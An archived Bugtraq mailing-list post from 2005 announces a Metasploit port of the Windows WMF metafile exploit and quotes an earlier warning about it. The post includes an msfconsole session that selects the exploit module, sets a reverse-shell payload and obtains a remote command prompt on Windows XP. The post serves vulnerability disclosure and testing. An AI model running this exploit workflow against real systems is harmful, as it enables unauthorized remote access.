Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Is this a new exploit?
From: H D Moore <sflist () digitaloffense net>
Date: Tue, 27 Dec 2005 21:34:51 -0600

I ported the exploit to the Metasploit Framework in case anyone wants to 
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:


Tested on Win XP SP1 and SP2.


+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to
[*] HTTP Client connected from using Windows XP
[*] Got connection from <->

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>  

On Tuesday 27 December 2005 14:20, noemailpls () noemail ziper wrote:
Warning the following URL successfully exploited a fully patched
windows xp system with a freshly updated norton anti virus.


The url runs a .wmf and executes the virus, f-secure will pick up the
virus norton will not.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]